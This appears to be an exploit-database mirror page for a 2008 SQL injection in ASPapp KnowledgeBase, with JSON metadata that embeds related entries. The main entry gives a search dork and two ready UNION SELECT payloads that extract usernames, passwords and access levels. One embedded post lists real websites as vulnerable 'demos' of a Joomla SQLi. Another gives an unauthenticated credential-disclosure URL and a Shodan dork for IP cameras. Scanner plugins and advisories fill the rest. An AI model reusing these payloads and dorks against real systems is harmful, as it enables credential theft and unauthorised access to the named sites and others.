Search...

ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability

2008-09-27T00:00:00

ID 1337DAY-ID-3774
Type zdt
Reporter Crackers_Child
Modified 2008-09-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability
===============================================================


Dork -  content_by_cat.asp?contentid ''catid'' 

Exploit : 

content_by_cat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,user_name from users

Exploit 2 :

content_by_cat.asp?contentid=-99999999&catid=-99887766 union select 0,null,password,3,accesslevel,5,null,7,8,user_name from users

DownLoad Site : http://camyuva.bel.tr/who.php



#  0day.today [2018-03-14]  #

JSON Vulners Source

Initial Source

{"hash": "de0459b9e087b9c48a755fc92be999712c0b1a1d9a16f271ac407fe0a938f73b", "id": "1337DAY-ID-3774", "lastseen": "2018-03-14T06:42:15", "viewCount": 3, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "3195e62d81b74fbef0492d8a738d41c8", "key": "href"}, {"hash": "4ad87eb8396fbb47d02cc7b33060f3fe", "key": "modified"}, {"hash": "4ad87eb8396fbb47d02cc7b33060f3fe", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "a99cc68e1870149c2e4575658353cecb", "key": "reporter"}, {"hash": "7b66c78c6e5892170cdbf122cd0318fd", "key": "sourceData"}, {"hash": "7159c274e41d92c1bac248eaf184d810", "key": "sourceHref"}, {"hash": "a9647f5d3f571a1f27d3c2e4116c0340", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2018-03-14T06:42:15"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310806153"]}, {"type": "zdt", "idList": ["1337DAY-ID-17540"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:25274", "SECURITYVULNS:VULN:3774", "SECURITYVULNS:DOC:3774"]}], "modified": "2018-03-14T06:42:15"}, "vulnersScore": 0.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/3774", "description": "Exploit for unknown platform in category web applications", "title": "ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "f79132a91474a5062603fda645d4b2d5199f9dc9bdae54279e27dc8a0ae36cbd", "id": "1337DAY-ID-3774", "lastseen": "2016-04-19T04:17:33", "enchantments": {"score": {"value": 4.1, "modified": "2016-04-19T04:17:33"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "19e0f963d416b3d9bb8670dcee875159", "key": "sourceHref"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "4ad87eb8396fbb47d02cc7b33060f3fe", "key": "modified"}, {"hash": "4ad87eb8396fbb47d02cc7b33060f3fe", "key": "published"}, {"hash": "9e54ad71945576b5c610cb3254c4f127", "key": "href"}, {"hash": "55d7e5c7fe7760d234288cf274e83a6c", "key": "sourceData"}, {"hash": "a9647f5d3f571a1f27d3c2e4116c0340", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "a99cc68e1870149c2e4575658353cecb", "key": "reporter"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/3774", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "ASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "===============================================================\r\nASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\nDork - content_by_cat.asp?contentid ''catid'' \r\n\r\nExploit : \r\n\r\ncontent_by_cat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,user_name from users\r\n\r\nExploit 2 :\r\n\r\ncontent_by_cat.asp?contentid=-99999999&catid=-99887766 union select 0,null,password,3,accesslevel,5,null,7,8,user_name from users\r\n\r\nDownLoad Site : http://camyuva.bel.tr/who.php\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2008-09-27T00:00:00", "references": [], "reporter": "Crackers_Child", "modified": "2008-09-27T00:00:00", "href": "http://0day.today/exploit/description/3774"}, "lastseen": "2016-04-19T04:17:33", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "===============================================================\r\nASPapp KnowledgeBase (catid) Remote SQL Injection Vulnerability\r\n===============================================================\r\n\r\n\r\nDork - content_by_cat.asp?contentid ''catid'' \r\n\r\nExploit : \r\n\r\ncontent_by_cat.asp?contentid=99999999&catid=-99887766 UNION SELECT 0,null,password,3,accesslevel,5,null,7,null,user_name from users\r\n\r\nExploit 2 :\r\n\r\ncontent_by_cat.asp?contentid=-99999999&catid=-99887766 union select 0,null,password,3,accesslevel,5,null,7,8,user_name from users\r\n\r\nDownLoad Site : http://camyuva.bel.tr/who.php\r\n\r\n\r\n\n# 0day.today [2018-03-14] #", "published": "2008-09-27T00:00:00", "references": [], "reporter": "Crackers_Child", "modified": "2008-09-27T00:00:00", "href": "https://0day.today/exploit/description/3774"}

{"zdt": [{"lastseen": "2018-01-09T23:13:40", "bulletinFamily": "exploit", "description": "Exploit for cgi platform in category web applications", "modified": "2016-08-19T00:00:00", "published": "2016-08-19T00:00:00", "id": "1337DAY-ID-25274", "href": "https://0day.today/exploit/description/25274", "type": "zdt", "title": "Vanderbilt IP Camera CCPW3025-IR / CVMW3025-IR - Credentials Disclosure", "sourceData": "1. Advisory Information\r\n========================================\r\nTitle : Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) Remote Credentials Disclosure\r\nVendor Homepage : https://is.spiap.com/\r\nRemotely Exploitable : Yes\r\nTested on Camera types : CCPW3025-IR , CVMW3025-IR\r\nProduct References : https://is.spiap.com/products/video/1_cameras/11_ip_camerars/bullet-kameror/v54561-c117-a100.html\r\n+ : https://uk.spiap.com/products/video/1_cameras/11_ip_camerars/114_vandal_resistent_dome_cameras/cvmw3025-ir.html\r\nVulnerability : Username / Password Disclosure (Critical/High)\r\nShodan Dork : title:\"Vanderbilt IP-Camera\"\r\nDate : 19/08/2016\r\nAuthor : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)\r\n \r\n \r\n2. CREDIT\r\n========================================\r\nThis vulnerability was identified during penetration test by Yakir Wizman.\r\n \r\n \r\n3. Description\r\n========================================\r\nVanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser.\r\n \r\n \r\n4. Proof-of-Concept:\r\n========================================\r\nSimply go to the following url:\r\nhttp://host:port/cgi-bin/readfile.cgi?query=ADMINID\r\n \r\nShould return some javascript variable which contain the credentials and other configuration vars:\r\nvar Adm_ID=\"admin\"; var Adm_Pass1=\u201cadmin\u201d; var Adm_Pass2=\u201cadmin\u201d; var Language=\u201cen\u201d; var Logoff_Time=\"0\"; \r\n \r\n-----------------------------------------------\r\n \r\nLogin @ http://host:port/cgi-bin/chklogin.cgi\r\n \r\n \r\n5. SOLUTION\r\n========================================\r\nContact the vendor for further information regarding the proper mitigation of this vulnerability.\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/25274"}, {"lastseen": "2018-03-12T18:49:12", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2012-02-18T00:00:00", "published": "2012-02-18T00:00:00", "id": "1337DAY-ID-17540", "href": "https://0day.today/exploit/description/17540", "type": "zdt", "title": "Joomla Component com_x-shop (iadd) <= SQLi Vulnerability", "sourceData": "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : 1337day.com 0\r\n1 [+] Support e-mail : submit[at]1337day.com 1\r\n0 0\r\n1 ######################################### 1\r\n0 I'm KedAns-Dz member from Inj3ct0r Team 1\r\n1 ######################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n###\r\n# Title : Joomla Component com_x-shop (idd) <= SQLi Vulnerability\r\n# Author : KedAns-Dz\r\n# E-mail : [email\u00a0protected] ([email\u00a0protected]) | [email\u00a0protected] | [email\u00a0protected]\r\n# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)\r\n# Web Site : www.1337day.com\r\n# Facebook : http://facebook.com/KedAns\r\n# Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com\r\n# platform : php\r\n# Type : Remote SQl Injection\r\n# Security Risk : High\r\n# Tested on : Windows XP-SP3 Fr\r\n###\r\n\r\n##\r\n# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |\r\n# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |\r\n# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |\r\n# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |\r\n# | ------------------------------------------------- < |\r\n##\r\n\r\n# [+] Exploit/p0c :\r\n\r\n+> d0rk : (\" allinurl:option=com_x-shop \")\r\n\r\n+> p0c :\r\n\r\nhttp://[target]/index.php?option=com_x-shop&action=artdetail&idd='\r\nhttp://[target]/index.php?option=com_x-shop&action=artdetail&idd='[SQLi]\r\n\r\nDemo's :\r\n\r\nhttp://www.abkamco.com/english/index.php?option=com_x-shop&action=artdetail&idd='\r\nhttp://www.mahtabyazd.com/english/index.php?option=com_x-shop&action=artdetail&idd='\r\nhttp://dinamicpower.it/index.php?option=com_x-shop&action=artdetail&idd='\r\nhttp://www.mmsc.com.my/index.php?option=com_x-shop&action=artdetail&idd='\r\n\r\n##---- Note ! : [={\r\nI Make and Published sOmE Projects and ToolKit's :p\r\n- It's Free and Open Source ! ^__^\r\n-- for Download/Testing try :\r\np1>[http://sourceforge.net/projects/l337cmsscaner/]\r\np2>[http://sourceforge.net/projects/r00t4lfi/]\r\n--- Any Think/Bug Sent me a messages to my e-mail 0k !\r\n##----}=]\r\n\r\n\r\n#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================\r\n# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy ..\r\n# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) \r\n# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * \r\n# Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever\r\n# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X\r\n# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TrOoN\r\n# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..\r\n#================================================================================================\r\n\r\n\n\n# 0day.today [2018-03-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/17540"}], "openvas": [{"lastseen": "2019-05-29T18:36:30", "bulletinFamily": "scanner", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "modified": "2019-05-03T00:00:00", "published": "2015-10-29T00:00:00", "id": "OPENVAS:1361412562310806153", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806153", "title": "Apple Mac OS X Multiple Vulnerabilities-03 October-15", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-03 October-15\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806153\");\n script_version(\"2019-05-03T08:55:39+0000\");\n script_cve_id(\"CVE-2015-5779\", \"CVE-2015-5783\", \"CVE-2015-5772\", \"CVE-2015-5771\",\n \"CVE-2015-5768\", \"CVE-2015-5763\", \"CVE-2015-5754\", \"CVE-2015-5753\",\n \"CVE-2015-5751\", \"CVE-2015-5750\", \"CVE-2015-5748\", \"CVE-2015-5747\",\n \"CVE-2015-3794\", \"CVE-2015-3799\", \"CVE-2015-3792\", \"CVE-2015-3791\",\n \"CVE-2015-3790\", \"CVE-2015-3789\", \"CVE-2015-3788\", \"CVE-2015-3787\",\n \"CVE-2015-3786\", \"CVE-2015-3783\", \"CVE-2015-3781\", \"CVE-2015-3780\",\n \"CVE-2015-3779\", \"CVE-2015-3777\", \"CVE-2015-3775\", \"CVE-2015-3774\",\n \"CVE-2015-3773\", \"CVE-2015-3772\", \"CVE-2015-3771\", \"CVE-2015-3770\",\n \"CVE-2015-3769\", \"CVE-2015-3767\", \"CVE-2015-3765\", \"CVE-2015-3764\",\n \"CVE-2015-3762\", \"CVE-2015-3761\", \"CVE-2015-3760\", \"CVE-2015-3757\",\n \"CVE-2013-7422\", \"CVE-2015-5784\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 08:55:39 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-10-29 13:43:34 +0530 (Thu, 29 Oct 2015)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-03 October-15\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists. For details refer\n reference section.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to obtain sensitive information, execute arbitrary code, bypass intended launch\n restrictions and access restrictions, cause a denial of service, write to\n arbitrary files, execute arbitrary code with system privilege.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions 10.9 through 10.9.5\n prior to build 13F1134 and 10.10.x before 10.10.5\");\n\n script_tag(name:\"solution\", value:\"Upgrade Apple Mac OS X 10.10.x to version\n 10.10.5 or later or apply appropriate patch for Apple Mac OS X 10.9.x. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT205031\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/security-announce/2015/Aug/msg00001.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.(10|9)\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.(10|9)\"){\n exit(0);\n}\n\nif(osVer =~ \"^10\\.9\")\n{\n if(version_in_range(version:osVer, test_version:\"10.9\", test_version2:\"10.9.4\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.9.5\")\n {\n buildVer = get_kb_item(\"ssh/login/osx_build\");\n if(buildVer)\n {\n if((osVer == \"10.9.5\" && version_is_less(version:buildVer, test_version:\"13F1134\")))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n }\n}\n\nelse if(version_in_range(version:osVer, test_version:\"10.10\", test_version2:\"10.10.4\")){\n fix = \"10.10.5\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:38", "bulletinFamily": "software", "description": "Hi folks,\r\n\r\nFirefox 3.6.13 fixes an interesting bug in their same-origin policy\r\nlogic for pseudo-URLs that do not have any inherent origin associated\r\nwith them. These documents are normally expected to inherit the\r\ncontext from their parent, or be assigned a unique one. This didn't\r\nwork as expected in Firefox, apparently due to a code refactoring in\r\n2008. The vulnerability permits malicious websites to access and\r\nmodify the contents of special pages such as about:neterror or\r\nabout:config, which has consequences ranging from content spoofing to\r\ncomplete subversion of the browser security model.\r\n\r\nMore info:\r\nhttp://lcamtuf.blogspot.com/2010/12/firefox-3613-damn-you-corner-cases.html\r\nWhimsical PoC: http://lcamtuf.coredump.cx/ffabout/\r\n\r\nPS. I posted a couple of probably interesting browser security\r\nwrite-ups on my blog of recent, recapping the status quo in areas such\r\nas HTTP cookie security. Some readers might find them interesting /\r\nuseful - say:\r\nhttp://lcamtuf.blogspot.com/2010/10/http-cookies-or-how-not-to-design.html\r\n\r\nCheers,\r\n/mz", "modified": "2010-12-10T00:00:00", "published": "2010-12-10T00:00:00", "id": "SECURITYVULNS:DOC:25274", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25274", "title": "Firefox 3.6.13 pseudo-URL SOP check bug (CVE-2010-3774)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:18", "bulletinFamily": "software", "description": "SNMP packet with invalid oid causes server to crash.", "modified": "2004-06-23T00:00:00", "published": "2004-06-23T00:00:00", "id": "SECURITYVULNS:VULN:3774", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:3774", "title": "GNU RADIUS SNMP DoS", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:06", "bulletinFamily": "software", "description": "TOPIC: Multiple incorrect permissions in QNX.\r\nADVISORY NR: 200202\r\nDATE: Nov 13 2002\r\nVULNERABILITY FOUND BY: 1; (One Semicolon)\r\n\r\n\r\nCONTACT INFORMATION:\r\nhttp://www.4os.org\r\ns@4os.org\r\n\r\n\r\nSTATUS: QNX Software Systems Ltd was contacted on November 11, 2002.\r\nI received prompt replies and was assured that this was being sent through\r\nthe proper channels to have this resolved. I was unable to receive a\r\npreliminary patch or a estimate as to how long this process would take.\r\n\r\n\r\nDESCRIPTION\r\nInstalling the OS Update for 6.2.0 (Patch A) will affect the permissions of\r\nio-audio.\r\n\r\nQNX also released two experimental patches to resolve rather big issues. \r\nThey\r\nhowever set incorrect permissions. These two patches are:\r\n - PhShutdown security patch\r\n - Package file system patch\r\n\r\ncpim (Chinese Method Input) and vpim (Japanese Method Input) version 2.0.3,\r\nbut most likely also earlier editions, set incorrect permissions.\r\n\r\nphrelaycfg, new since QNX 6.1.0, also has incorrect permissions.\r\n\r\nAs part of the games pack, version 2.0.3 in this case, the following games\r\nare installed with improper permissions:\r\n - Columns\r\n - Othello\r\n - Peg\r\n - Solitaire\r\n - Vpoker\r\n\r\nISSUE\r\nAll aforementioned programs have permissions of rwxrwxrwx. This means that\r\nany user can read or write to the binaries allowing anyone to replace them.\r\n\r\nThe following files are affected:\r\nOS Update Patch A:\r\n - /sbin/io-audio\r\n\r\nQNX experimental patches:\r\n - /bin/shutdown\r\n - /sbin/fs-pkg\r\n - /usr/photon/bin/phshutdown\r\n\r\nCPIM/VPIM\r\n - /usr/photon/bin/cpim\r\n - /usr/photon/bin/vpim\r\n\r\nPhrelaycfg\r\n - /usr/photon/bin/phrelaycfg\r\n\r\nGames\r\n - /usr/photon/bin/columns\r\n - /usr/photon/bin/othello\r\n - /usr/photon/bin/peg\r\n - /usr/photon/bin/solitaire\r\n - /usr/photon/bin/vpoker\r\n\r\n\r\nSYSTEM INFORMATION:\r\nQNX 6.2.0 Non-commercial edition on an x86 architecture was used. All \r\npatches\r\nand updates were applied at the time of writing.\r\n\r\n\r\nFIX\r\nAdjust the permissions of these particular binaries. Then proceed\r\nto search the complete file system for any other files that may not have\r\nproper permissions.\r\n\r\nContact QNX to find out what appropriate actions to take to prevent this in\r\nthe future.\r\n\r\n\r\nFINAL NOTES\r\nSome systems have been found that have different permissions for different\r\nfiles.\r\n\r\nBefore letting anyone access a QNX system, it is always a good idea to\r\nexecute "find / -perm -2 ! -type l -ls >> result.txt". Besides the programs\r\nmentioned today, several other programs may or may not have set proper\r\npermissions depending on the amount of packages you installed.\r\n", "modified": "2002-11-20T00:00:00", "published": "2002-11-20T00:00:00", "id": "SECURITYVULNS:DOC:3774", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:3774", "title": "Multiple incorrect permissions in QNX.", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:17", "bulletinFamily": "software", "description": "Multiple patches are set with weak file permissions.", "modified": "2002-11-20T00:00:00", "published": "2002-11-20T00:00:00", "id": "SECURITYVULNS:VULN:2422", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:2422", "title": "QNX weak permissions", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "mozilla": [{"lastseen": "2016-09-05T13:37:42", "bulletinFamily": "software", "description": "Security researcher Paul Stone reported that a\nbrowser applet could be used to turn a simple mouse click into a\ndrag-and-drop action, potentially resulting in the unintended loading\nof resources in a user's browser. This behavior could be used twice\nin succession to first load a privileged chrome: URL in a\nvictim's browser, then load a malicious javascript: URL\non top of the same document resulting in arbitrary script execution\nwith chrome privileges.", "modified": "2010-03-30T00:00:00", "published": "2010-03-30T00:00:00", "id": "MFSA2010-20", "href": "http://www.mozilla.org/en-US/security/advisories/mfsa2010-20/", "type": "mozilla", "title": "Chrome privilege escalation via forced URL drag and drop", "cvss": {"score": 0.0, "vector": "NONE"}}]}